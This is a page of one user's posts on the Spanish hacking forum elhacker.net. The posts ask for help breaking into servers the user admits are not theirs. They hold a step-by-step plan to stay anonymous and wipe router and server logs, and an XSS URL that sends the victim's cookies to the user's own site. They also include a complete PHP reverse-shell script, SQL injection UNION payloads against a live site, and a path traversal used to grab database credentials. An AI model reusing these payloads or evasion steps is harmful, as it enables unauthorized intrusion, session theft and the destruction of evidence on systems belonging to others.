elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 28
31  Seguridad Informática / Hacking / 100% anónimo? en: 17 Mayo 2012, 16:28 pm
Supongamos que yo quisiera hacer un hipotético ataque hacia un hipotético servidor que hipotéticamente hablando no sea mio (digamos que ha sido un prefacio exculpatorio). Y mi objetivo como no es pasar desapercibido coger la información e irme o simplemente controlar el servidor, mi pregunta es: ¿El método que desarrollaré a continuación es completamente anónimo?

1- Salgo de mi casa, me acerco a un McDonald, me siento en un bar cercano pido una Coca-Cola. Me conecto a la red del McDonald y procedo.

2- Enciendo ettercap y wireshark miro quién está conectado y observo que todas las conexiones sean completamente normales.

3- Saco la contraseña del router, la cual confío sea por defecto para no tener que usar fuerza bruta, y accedo a la puerta de enlace del router.

4- Cambio la configuración para que deje de registrar "eventos" y borro los registrados hasta ahora.

5- Con ayuda de TOR y proxychains anonimizo mis probatinas y finalmente si todo va bien la intrusión.

6- Accedo al servidor y posteriormente intento conseguir una terminal con permisos de administrador, mediante explotación del kernel u otros, ahora hay dos opciones:

6.1- Si la consigo accedo a los logs y borro toda mi información, programo un script de autoborrado de logs o simplemente lo hago yo manualmente, ahora ya puedo acceder desde mi casa con total confianza y seguridad ya que los logs pueden ser borrados.

6.2- Si no consigo la cuenta de administrador mantengo el mismo método cada vez que quiera acceder a este servidor o bien envío la información a través de otro servidor al que haya accedido con anterioridad y tenga permisos de administrador.

Bueno creo que el método es 100% seguro y que ni siquiera haría falta usar TOR si estas desde un McDonald pero en el hipotético caso de que existiera intención de encontrarme o no hubiera borrado bien todos los logs tendrían que pedir los hipotéticos interesados una orden judicial lo que me daría más tiempo.

Si añado ademas que el sistema operativo(BackTrack) con todos los datos están en un pendrive por mayor seguridad queda precioso.

Al principio esto iba a ser un artículo solo de pregunta pero me he dado cuenta que con un par de enlaces quizás podía ayudar a alguien así que espero que os sirva y si me he liado en algo decírmelo sin preocupaciones.

Un saludo Mr. Paranoias digo.... Sora :)
32  Seguridad Informática / Hacking / Re: Dudas en diversos pentest... en: 15 Mayo 2012, 19:10 pm
Dios.. muy imaginativo dimitrix no se me habia ocurrido :) bueno me disculpo por las tardanzas pero no e podido estar muy activo gracias por su ayuda..
33  Seguridad Informática / Hacking / Re: Dudas en diversos pentest... en: 25 Abril 2012, 19:19 pm
Haber, el uploader era de un curriculum pero estaba sin filtros solo ponia una recomendacion en plan porfavor prefiero .doc o .pdf aun asi enfin lo he dejado por unos dias asi a ver si se me ocurre algo.

El XSS ya esta todo claro, luego he añadido un window.location que lo llevara a la pagina que se supone que tiene que ir para que el ataque no quede "descolgado" el resto ingenieria social, aunqeu todavia estoy mirando desde donde lo voy a enviar si desde una web mail spoofing o desde un correo propio todo depende del pretexto :)

Buah aver el sistema es debian y lo he probado todo a nivel del kernel he usado montonazo de exploits, creo que el comando sudo en este sistema no funciona, tiene el su pero tampoco e encontrado vulns a ese nivel, he listado todos los programas a ver si encuentro algun bug que explotar pero he subido y eliminado cientos de exploits estoy casi asta los huev** :) necesito conseguir acceso a los logs para borrar mis huellas y para eso necesito root :( alguien se le ocurre algo? si necesitais mas info...

Un saludo!
34  Seguridad Informática / Hacking / Dudas en diversos pentest... en: 18 Abril 2012, 18:50 pm
Haber gentecilla :) hace ya mucho que no me pasaba por aqui y ahora tengo muchas dudas y no se como solucionarlas a ve si alguien me echa una mano...

PRIMERO:

Estoy llevando un pentest hacia una web y he encontrado un uploader sin filtros he subido una shell modificada para tener un aspecto mas amigable pero no he encontrado la ruta donde se envian los archivos, en mi busqueda he encontrado tambien una FPD(Full Path Disclosure) pero obvio que no muestra la ruta de la shell, tambien he encontrado una SQL injection pero tampoco me vale para nada ya que no hay ni siquiera un panel de contenidos, no al total del servidor.

SEGUNDA:

Realizando otro pentest he encontrado una XSS no persistente os paso la inyeccion a ver si lo hago bien esque es la primera que hago :S el buscador no tiene filtros ni nada y al realizar una busqueda aparece:

Código
  1. <li><span class="totalpaginas">Resultados para mibusqueda</span></li>

y la url queda asi:

http://www.idomain.com/buscador/results?title=mibusqueda

Asi que la url que e preparado es esta:

www.idomain.com/buscador/results?title=</span></li><script>window.location=’http://miweb/ckie.php=’+document.cookie</script>

supongo que bastante simple no? pero bueno am y tengo otra duda respecto a esto necesitaria luego redireccionar al administrador a la web que quiera eso en JS como se haria?

TERCERO:

Tengo una shell inversa en php con este programa:

Código
  1. <?php
  2.  
  3. /*********************
  4.  
  5. @@author : lionaneesh
  6. @@facebook : facebook.com/lionaneesh
  7. @@Email : lionaneesh@gmail.com
  8.  
  9. ********************/
  10.  
  11.  
  12. ini_set('max_execution_time',0);
  13.  
  14. ?>
  15.  
  16. <html>
  17. <head>
  18.    <title>Back Connect Shell -- PHP</title>
  19. </head>
  20.  
  21. <body>
  22.  
  23. <h1>Welcome to Back Connect Control Panel </h1>
  24.  
  25. <p> Fill in the form Below to Start the Back Connect Service </p>
  26.  
  27. <?php
  28. if( isset($_GET['port']) &&
  29.    isset($_GET['ip']) &&
  30.    $_GET['port'] != "" &&
  31.    $_GET['ip'] != ""
  32.    )
  33.    {
  34.        echo "<p>The Program is now trying to connect!</p>";
  35.        $ip = $_GET['ip'];
  36.        $port=$_GET['port'];
  37.        $sockfd=fsockopen($ip , $port , $errno, $errstr );
  38.        if($errno != 0)
  39.        {
  40.            echo "<font color='red'><b>$errno</b> : $errstr</font>";
  41.        }
  42.        else if (!$sockfd)
  43.        {
  44.               $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
  45.        }
  46.        else
  47.        {
  48.            fputs ($sockfd ,
  49.            "\n=================================================================\n
  50.            Back Connect in PHP\n
  51.            Coded by lionaneesh\n
  52.            @@author : lionaneesh
  53.            @@facebook : facebook.com/lionaneesh
  54.            @@Email : lionaneesh@gmail.com
  55.            \n=================================================================");
  56.         $pwd = shell_exec("pwd");
  57.         $sysinfo = shell_exec("uname -a");
  58.         $id = shell_exec("id");
  59.         $dateAndTime = shell_exec("time /t & date /T");
  60.         $len = 1337;
  61.         fputs($sockfd ,$sysinfo . "\n" );
  62.         fputs($sockfd ,$pwd . "\n" );
  63.         fputs($sockfd ,$id ."\n\n" );
  64.         fputs($sockfd ,$dateAndTime."\n\n" );
  65.         while(!feof($sockfd))
  66.         {
  67.            $cmdPrompt ="(Shell)[$]> ";
  68.            fputs ($sockfd , $cmdPrompt );
  69.            $command= fgets($sockfd, $len);
  70.            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  71.         }
  72.         fclose($sockfd);
  73.        }
  74.    }
  75.    else
  76.    {
  77.    ?>
  78.    <table align="center" >
  79.         <form method="GET">
  80.         <td>
  81.            <table style="border-spacing: 6px;">
  82.                <tr>
  83.                    <td>Port</td>
  84.                    <td>
  85.                        <input style="width: 200px;" name="port" value="31337" />
  86.                    </td>
  87.                </tr>
  88.                <tr>
  89.                    <td>IP </td>
  90.                    <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
  91.                </tr>
  92.                <tr>
  93.                <td>
  94.                <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
  95.                </td>
  96.                </tr>  
  97.  
  98.            </table>
  99.         </td>
  100.         </form>
  101.    </tr>
  102.    </table>
  103.    <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
  104. <?php
  105.    }
  106. ?>

El problema es que a pesar de el uso de varios exploits para intentar escalar privilegios no consigo la shell de root :( la maquina es ubuntu y el kernel:

2.6.28.8-20120119a-iscsi-ntacker-3ware-amd-sec8-ram64-grsec

bueno a pesar de la busqueda exahustiva por google no consigo nada :( asiqeu a ver si me podeis echar una manita :P un saludo chicos!!!!
35  Seguridad Informática / Nivel Web / Re: Duda en Inyeccion SQL al ver tablas en: 25 Febrero 2012, 10:44 am
entonces sera que no se usar los limits :S alguien me puede echar una mano porque en internet no encuentro nada especifico sobre limits...

Ya esta solucionado me fallaba la sintaxis muchas gracias shell y edu las probare una a una :)
36  Seguridad Informática / Nivel Web / Re: Duda en Inyeccion SQL al ver tablas en: 24 Febrero 2012, 22:12 pm
Jajaja lo cierto esque ya e echo algun deface pero tenia interes especial en esta web que estoy trabajando ahora....
37  Seguridad Informática / Nivel Web / Re: Duda en Inyeccion SQL al ver tablas en: 24 Febrero 2012, 21:26 pm
Y no puedo hacer nada :S porque jode bastante encontrar la vulnerabilidad y que justo no se vean las tablas buenas :S
38  Seguridad Informática / Nivel Web / Duda en Inyeccion SQL al ver tablas en: 24 Febrero 2012, 17:35 pm
Hola a todos estoy probando las SQLi  ya que no lo habia echo nunca y tengo una duda he encontrado una pagina vulnerable y ya e sacado el numero de columnas la que es vulnerable pero al pedir la lista de tablas no consigo que me la de entera, siempre me corta la lista, he probado concat(table_name), group_concat(table_name) he probado con limites peor nose... alguna idea?

Esta es la url que e probado:

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201000--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

http://www.xxxxxxxx.com/inscripcion.php?id=89%20and%201=0%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables--

Un saludo
39  Seguridad Informática / Hacking / Duda en: 15 Febrero 2012, 21:29 pm
Hola amigos me pase por aqui a ver si me podian solucionar una duda que me ha surgido..
veran estoy prbando  la web de un amigo y para su desgracia e encontrado esto:

..../descargar.php?=/var/www/.... he probado y efectivamente tengo acceso hasta la raiz del servidor.. eso si a la carpeta root nada de nada.. he encontrado la contraseña del phpmyadmin y he descargado el archivo qe la contiene ahora bien no consigo localizar el phpmyadmin para loguearme, he usado un bruteador de directorios como el intellitamper pero nada de nada voy completamente a ciegas.. ustedes que em recomiendan...

Un saludo :)
40  Seguridad Informática / Hacking / Re: Gorrón en residencia universitaria en: 13 Octubre 2011, 13:28 pm
mmmm a ver busca con el ettercap el gateway y ponble filtrado mac :)
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 28
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines